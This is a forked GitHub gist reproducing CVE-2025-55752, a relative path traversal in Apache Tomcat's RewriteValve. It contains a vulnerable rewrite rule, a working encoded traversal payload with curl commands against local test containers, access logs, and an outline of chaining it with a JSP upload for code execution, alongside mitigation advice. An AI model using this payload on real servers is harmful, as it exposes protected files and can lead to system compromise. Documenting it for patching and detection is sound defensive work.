Skip to content

Instantly share code, notes, and snippets.

@namhikelo

namhikelo/CVE-2025-55752.md

Forked from N3mes1s/CVE-2025-55752.md
Created November 2, 2025 14:24
Show Gist options

  • Select an option

    Learn more about clone URLs
  • Save namhikelo/472ddfa79e3ac9a5cfaaa6f836df1dde to your computer and use it in GitHub Desktop.

Select an option

Learn more about clone URLs
Save namhikelo/472ddfa79e3ac9a5cfaaa6f836df1dde to your computer and use it in GitHub Desktop.
Download ZIP
Apache Tomcat Rewrite Valve Relative Path Traversal (GHSA-wmwf-9ccg-fff5 / CVE-2025-55752)
Raw
CVE-2025-55752.md

Apache Tomcat Rewrite Valve Relative Path Traversal (GHSA-wmwf-9ccg-fff5 / CVE-2025-55752)

Date: 2025-10-28

1. Executive Summary

We reproduced the relative path traversal vulnerability affecting Apache Tomcat versions 8.5.6–8.5.100, 9.0.0.M11–9.0.108, 10.1.0-M1–10.1.44, and 11.0.0-M1–11.0.10. The issue arises when RewriteValve rules incorporate user-controlled query parameters into rewritten URLs. Tomcat normalises the rewritten URI before decoding it, permitting encoded ../ sequences to slip past security constraints. During our assessment we:

  • Deployed a vulnerable Tomcat 9.0.108 instance with a rewrite rule representative of the affected applications.
  • Confirmed that an encoded traversal payload (path=%2FWEB-INF%2Fweb.xml) retrieves protected resources (HTTP 200) that should be inaccessible.
  • Verified that the same request against patched Tomcat 9.0.109 yields HTTP 404, demonstrating the effectiveness of the upstream fix.

Impact: Any protected resource reachable via the rewrite rule becomes accessible. If the application also allows authenticated uploads (e.g., WebDAV, file upload features), an attacker could plant a JSP and obtain remote code execution (RCE). Although RCE was not executed in this run, the scenario remains viable under the advisory’s conditions.

CWE Classification:

  • CWE-23: Relative Path Traversal
  • CWE-159: Failure to Handle Significant Value Encodings (relevant due to decode-before-normalize logic)

2. Vulnerability Overview

2.1 Root Cause

The RewriteValve normalises rewritten URLs before decoding percent-encoded characters. When a rewrite rule copies a query parameter into the path, an attacker can supply encoded traversal sequences (e.g., %2e%2e/WEB-INF/web.xml). Tomcat normalises the URL, removing ../, and then decodes it—restoring the traversal and allowing access outside the intended directory.

Upstream correction (commit b5042622b8b78340ae65403c55dcb9c7416924df, released in Tomcat 11.0.11 / 10.1.45 / 9.0.109) reorders these operations: rewrite → decode → normalise.

2.2 Exploit Scenario

  1. Victim Tomcat app has a rewrite rule such as: 
    RewriteCond %{QUERY_STRING} (^|&)path=([^&]+)
RewriteRule ^/download$ /%2 [B,L]
  2. Attacker sends: GET /download?path=%2FWEB-INF%2Fweb.xml.
  3. Vulnerable Tomcat 9.0.108 responds with the contents of /WEB-INF/web.xml.
  4. Patched Tomcat 9.0.109 rejects the same request (HTTP 404).

If PUT/WebDAV or another upload mechanism exists, attacker can:

  1. Upload shell.jsp into /webapps/<context>/uploads/.
  2. Request GET /download?path=%2Fuploads%2Fshell.jsp.
  3. Execute arbitrary code via the JSP.

3. Reproduction Environment

  • Base Image: tomcat:9.0.108-jdk17-temurin
  • Patched Control: tomcat:9.0.109-jdk17-temurin
  • Rewrite Rule: conf/Catalina/localhost/rewrite.config
  • Evidence Directory: evidence/latest/
  • Command Summary: 
    nerdctl run --name tomcat-vuln -d -p 8080:8080 \
  -v "$PWD/conf":/usr/local/tomcat/conf \
  -v "$PWD/webapps":/usr/local/tomcat/webapps \
  tomcat:9.0.108-jdk17-temurin

curl -i "http://localhost:8080/download?path=%2FWEB-INF%2Fweb.xml"

nerdctl run --name tomcat-fixed -d -p 8081:8080 \
  -v "$PWD/conf":/usr/local/tomcat/conf \
  -v "$PWD/webapps":/usr/local/tomcat/webapps \
  tomcat:9.0.109-jdk17-temurin

curl -i "http://localhost:8081/download?path=%2FWEB-INF%2Fweb.xml"

4. Evidence

4.1 Protected File Disclosure

  • vuln_body.xml (Tomcat 9.0.108) contains the full WEB-INF/web.xml: 
    <?xml version="1.0" encoding="UTF-8"?>
<web-app xmlns="https://jakarta.ee/xml/ns/jakartaee" ...>
    <display-name>RewriteTraversalDemo</display-name>
    <description>Protected descriptor used to demonstrate CVE-2025-55752 traversal.</description>
</web-app>
  • vuln_access.log: 200 response for /download?path=%2FWEB-INF%2Fweb.xml.
  • fixed_access.log: 404 response under Tomcat 9.0.109 for the same request.

4.2 Rewrite Configuration

conf/Catalina/localhost/rewrite.config:

RewriteCond %{QUERY_STRING} (^|&)path=([^&]+)
RewriteRule ^/download$ /%2 [B,L]

4.3 Server Configuration

conf/server.xml includes:

<Valve className="org.apache.catalina.valves.rewrite.RewriteValve" />

5. Impact Assessment

  • Information Disclosure: Any file under /WEB-INF or /META-INF can be read (credentials, configuration, proprietary code).
  • Potential RCE: If uploads (PUT/WebDAV, admin file manager, etc.) are enabled, attackers can plant JSP/EL payloads and execute OS commands.
  • Likelihood: Medium (depends on rewrite rule presence and upload capability).
  • Severity: High (system compromise possible).

6. Mitigation Recommendations

  1. Upgrade: Tomcat 11.0.11+, 10.1.45+, or 9.0.109+ (includes fix for CVE-2025-55752).
  2. Rewrite Rule Hygiene: Avoid copying raw query parameters into paths. Enforce whitelist or reject encoded ../.
  3. Restrict PUT/WebDAV: Disable for untrusted users; lock down uploads to authenticated roles.
  4. Monitoring: Inspect access logs for %2FWEB-INF patterns; add WAF rules to block traversal sequences.

7. Appendices

7.1 Full conf/Catalina/localhost/rewrite.config

RewriteCond %{QUERY_STRING} (^|&)path=([^&]+)
RewriteRule ^/download$ /%2 [B,L]

7.2 webapps/ROOT/WEB-INF/web.xml

<?xml version="1.0" encoding="UTF-8"?>
<web-app xmlns="https://jakarta.ee/xml/ns/jakartaee"
         xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
         xsi:schemaLocation="https://jakarta.ee/xml/ns/jakartaee https://jakarta.ee/xml/ns/jakartaee/web-app_5_0.xsd"
         version="5.0">
    <display-name>RewriteTraversalDemo</display-name>
    <description>Protected descriptor used to demonstrate CVE-2025-55752 traversal.</description>
</web-app>

7.3 vuln_access.log (excerpt)

10.4.0.1 - - [28/Oct/2025:18:27:21 +0000] "GET / HTTP/1.1" 200 264
10.4.0.1 - - [28/Oct/2025:18:27:21 +0000] "GET /%2fWEB-INF%2fweb.xml?path=%2fWEB-INF%2fweb.xml HTTP/1.1" 200 460

7.4 fixed_access.log (excerpt)

10.4.0.1 - - [28/Oct/2025:18:27:32 +0000] "GET / HTTP/1.1" 200 264
10.4.0.1 - - [28/Oct/2025:18:27:32 +0000] "GET /%2fWEB-INF%2fweb.xml?path=%2fWEB-INF%2fweb.xml HTTP/1.1" 404 683

7.5 reproduction_steps.sh (selected commands)

nerdctl run --name tomcat-vuln -d -p 8080:8080 \
  -v "$PWD/conf":/usr/local/tomcat/conf \
  -v "$PWD/webapps":/usr/local/tomcat/webapps \
  tomcat:9.0.108-jdk17-temurin

curl -i "http://localhost:8080/download?path=%2FWEB-INF%2Fweb.xml"

nerdctl run --name tomcat-fixed -d -p 8081:8080 \
  -v "$PWD/conf":/usr/local/tomcat/conf \
  -v "$PWD/webapps":/usr/local/tomcat/webapps \
  tomcat:9.0.109-jdk17-temurin

curl -i "http://localhost:8081/download?path=%2FWEB-INF%2Fweb.xml"

8. Conclusion

The relative path traversal vulnerability (GHSA-wmwf-9ccg-fff5 / CVE-2025-55752) is reproducible on Tomcat versions up to 9.0.108. The fix in 9.0.109 blocks our exploit. Organizations should upgrade immediately and audit rewrite logic to prevent encoded traversal sequences. Where PUT/WebDAV is enabled, we strongly recommend additional hardening to avoid remote code execution.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment